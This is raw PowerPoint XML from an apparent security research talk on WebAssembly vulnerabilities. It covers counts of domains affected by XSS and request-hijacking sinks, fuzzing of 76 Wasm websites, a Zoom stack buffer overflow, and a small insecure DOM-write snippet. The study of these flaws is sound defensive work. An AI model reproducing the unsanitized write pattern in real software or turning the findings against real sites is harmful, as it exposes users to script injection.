                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="640170763"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="66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de-DE" sz="2200" b="1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200" b="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>#Domains</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="2200" b="1" i="0" u="none" strike="noStrike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456840486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XMLHttpRequest.response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5118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684316885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WebSocket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4971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624480897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location.href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2401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235999045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location.pathname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194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893896098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sessionStorage.getItem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486082926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location.search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876976346"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="63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location.hash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268156896"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl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3931965-6592-C33E-A3A9-D83AD120F802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2041182" y="2047565"/>
            <a:ext cx="1719113" cy="836654"/>
            <a:chOff x="2041182" y="2047565"/>
            <a:chExt cx="1719113" cy="836654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1120BF75-F931-7C1B-E705-5AFD669C2B26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2188905" y="2158536"/>
              <a:ext cx="1026825" cy="610741"/>
              <a:chOff x="3065317" y="4864318"/>
              <a:chExt cx="1124845" cy="611691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2607DD1B-F2F6-1254-C54C-EB86FC1D6BB4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3065317" y="4879148"/>
                <a:ext cx="1124845" cy="5968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Grafik 14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4F2C004F-6415-09AF-3C30-06C3948E7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3351028" y="4864318"/>
                <a:ext cx="605407" cy="590272"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grp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4A3A517-60D5-7BE4-60CD-FFE5A67B3733}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2041182" y="2047565"/>
              <a:ext cx="1719113" cy="836654"/>
            </a:xfrm>
            <a:prstGeom prst="rect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Picture 2" descr="https://cdn1.iconfinder.com/data/icons/large-glossy-icons/512/Spy.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E1BF87E-4F57-7B30-962E-6964722CD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954" y="2099361"/>
              <a:ext cx="700339" cy="71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Sprechblase: rechteckig mit abgerundeten Ecken 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625C35D3-EA2F-9811-03DB-701B7E777B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386439" y="3800223"/>
            <a:ext cx="4246920" cy="2085540"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72358"/>
              <a:gd name="adj2" fmla="val -152362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err="1"/>
              <a:t>Only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t> &lt;2% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>dataflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>sanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Sprechblase: rechteckig mit abgerundeten Ecken 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57303194-BB1E-F962-F82C-96595C5F200F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7514534" y="4772952"/>
            <a:ext cx="3608034" cy="1719922"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31967"/>
              <a:gd name="adj2" fmla="val 18195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/>
              <a:t>29,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>websites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41184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DD70-1868-763F-CE3B-8971626BB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9406C479-B054-B26E-A4CE-15F0BD0A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Implicit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t> Trust, Explicit Danger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E2672F-08D0-F535-AAC8-F300FF0F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de-DE" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>24.07.2025</a:t>
            </a:r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508E73-3CB3-058F-65BF-05F8013D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Securing the Next-Generation Web: A Holistic Approach to Wasm Vulnerabilities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3BE12A-4687-C2F5-2283-F9F4AD99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CB18F4C-E8C4-4CE3-AB98-635666EFA01A}" type="slidenum">
              <a:rPr lang="en-US" sz="900" smtClean="0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sz="900">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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B4F4C973-405E-4A02-AE12-6C12AB028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4233"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5610813" y="1105995"/>
          <a:ext cx="6247512" cy="5038347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409171">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2542736028"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2123337">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1857611379"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1715004">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="37018879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1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Sink</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="2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200" b="1" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="2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200" b="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>#Domains</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="22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b"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1395270710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Function.ctor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2286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2389927965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a.href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1341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973642252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fetch.url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Request Hijacking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1054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34576113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innerHTML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842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894556094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eval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643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943557019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open(</a:t>
                      </a:r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url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE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Request Hijacking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497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158667002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="42364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sessionStorage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 err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Stored</a:t>
                      </a:r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 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345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330565052"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="71038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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>document.cookie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u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Stored</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE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 XSS</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE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de-DE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5545" marR="87327" marT="87327" marB="87327" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2767282288"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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5B2EB07E-C04D-D61A-784B-680161268921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="267069" y="633618"/>
            <a:ext cx="4637439" cy="2425809"/>
            <a:chOff x="-101723" y="1036988"/>
            <a:chExt cx="5646557" cy="2556195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F4657CAF-AA2F-9977-6054-E73D7C47BD20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-101721" y="1688951"/>
              <a:ext cx="5646555" cy="190423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de-DE" sz="1400" err="1">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>string</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t> 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tag = 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"&lt;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img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 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src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='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data:image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/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" err="1">
                  <a:solidFill>
                    <a:srgbClr val="CE9178"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>png</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="CE9178"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>;"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" err="1">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>void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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" err="1">
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>decodeImage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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" err="1">
                  <a:solidFill>
                    <a:srgbClr val="4EC9B0"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" err="1">
                  <a:solidFill>
                    <a:srgbClr val="8BC2E1"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>image</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>) {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="1425"/>
                </a:lnSpc>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="6A9955"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  //...</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" err="1">
                  <a:solidFill>
                    <a:srgbClr val="9CDCFE"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" err="1">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" err="1">
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>writeToDom</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>(tag, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" err="1">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>img</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Grafik 28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ACD9C480-2F6D-AA72-B8CF-170D37C3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-101723" y="1036988"/>
              <a:ext cx="1097830" cy="8437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38E4371F-BCBB-DE69-9E84-4B9422AB33CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541184" y="2173517"/>
            <a:ext cx="3862713" cy="40763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Sprechblase: rechteckig mit abgerundeten Ecken 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545D5ACA-3E27-4AEC-BA49-48D0E7002252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395263" y="3798573"/>
            <a:ext cx="4246920" cy="2521204"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74751"/>
              <a:gd name="adj2" fmla="val -47622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err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t>easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Sprechblase: rechteckig mit abgerundeten Ecken 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7DC8E92-ABBF-4F10-D040-D1A85F188FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667906" y="4887252"/>
            <a:ext cx="3608034" cy="1719922"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31967"/>
              <a:gd name="adj2" fmla="val 1819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/>
              <a:t>4,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" err="1"/>
              <a:t>websites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38456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98293FC-C353-5459-560F-FB11C20D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Prevalance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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" err="1"/>
              <a:t>new</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" err="1"/>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t> Model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4C0FB0F-DCDC-6281-CC17-22A1FD035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/>
              <a:t>We detected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2782 domains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>vulnerable to this threat model</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="440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FB7894-319B-00F3-88F2-0C56E5D1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96A0C-0C68-5909-EBD9-5EB0A513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31E46C-F012-D4AD-06EC-2B3669D1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88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320D-BC3D-C258-C016-ECC0B792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F2BDD-F39E-F240-F96A-3276EE23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e-DE"/>
              <a:t>Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" err="1"/>
              <a:t>Corruption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Wild</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Gerader Verbinder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E82C5F6-FDFB-E806-7DB8-7EADCE0C4749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1179883"/>
            <a:ext cx="10515600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13CAAFD6-833A-863A-84BE-C44501AF9BA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1179883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/>
              <a:t>Fuzzed 76 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="1200" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="1200"/>
              <a:t> websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Gerader Verbinder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF592BB-E5F5-D7F0-3955-BAABA1258873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2241979"/>
            <a:ext cx="10515600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="lin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C8C14B2B-783D-182E-C9F6-A2F40F88A2D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2241979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/>
              <a:t>Zoom stack-based buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t> Arbitrary write</a:t>
            </a:r>
          </a:p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Gerader Verbinder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FE8F9F-D367-5806-AA4E-138F680EED5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3304074"/>
            <a:ext cx="10515600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="lin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DDD7CCE-5B12-7480-3C96-679DB31CE143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3304074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lvl="0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/>
              <a:t>Memory corruption to XSS on different websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Gerader Verbinder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44696395-9E4E-4A6A-30AD-34581B5FAA9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4366170"/>
            <a:ext cx="10515600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="lin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460703D-906C-A12E-60F5-FA72AA732812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4366170"/>
            <a:ext cx="10515600" cy="1062095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10515600"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1062095"/>
              <a:gd name="connsiteX1" fmla="*/ 10515600 w 10515600"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1062095"/>
              <a:gd name="connsiteX2" fmla="*/ 10515600 w 10515600"/>
              <a:gd name="connsiteY2" fmla="*/ 1062095 h 1062095"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 10515600"/>
              <a:gd name="connsiteY3" fmla="*/ 1062095 h 1062095"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 10515600"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10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62095">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10515600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10515600" y="1062095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10620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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l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/>
              <a:t>All detected memory errors are browser reproducible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E6474E-D2F8-EA1D-7C42-DA45AF70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schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>24.07.2025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FF5F63-F3FA-7D0A-BCD0-D89E4175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Securing the Next-Generation Web: A Holistic Approach to Wasm Vulnerabilities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9CB18C-0705-7FBC-D464-6D0C2EA8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0CB18F4C-E8C4-4CE3-AB98-635666EFA01A}" type="slidenum">
              <a:rPr lang="de-DE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gen 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B425B470-DF5D-48AA-6810-9721DF443200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567158" y="1597306"/>
            <a:ext cx="1042377" cy="4247910"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16265657"/>
              <a:gd name="adj2" fmla="val 5286441"/>
            </a:avLst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D2C9A-C040-72A9-A248-D13EF312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Quantitative Evaluation</a:t>
            </a:r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3178BE6-CABF-0C9E-02A5-6A4BFD0AD1C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="718631" y="1285339"/>
            <a:ext cx="6376545" cy="914400"/>
            <a:chOff x="718631" y="1285340"/>
            <a:chExt cx="6376545" cy="830093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9C5BAE5-3AB1-CFC5-E1C3-9E5AFCBEC6B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133678" y="1368350"/>
              <a:ext cx="5961498" cy="664075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5961498"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 664075"/>
